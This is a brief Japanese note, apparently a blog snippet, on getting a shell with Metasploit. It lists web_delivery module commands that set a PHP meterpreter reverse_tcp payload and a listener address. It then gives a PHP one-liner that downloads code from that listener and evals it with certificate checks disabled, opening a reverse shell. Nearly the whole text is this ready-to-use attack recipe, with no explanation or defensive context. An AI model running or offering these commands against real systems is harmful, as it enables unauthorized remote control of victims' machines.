msfは制御端子として使用する.
1533 ワード
命令実行上、shellを取りに行きます.
use exploit/multi/script/web_delivery
show options
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.232.136
run
はこのコードを実行します.php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.232.136:8080/8NrtquVL', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
shellを取る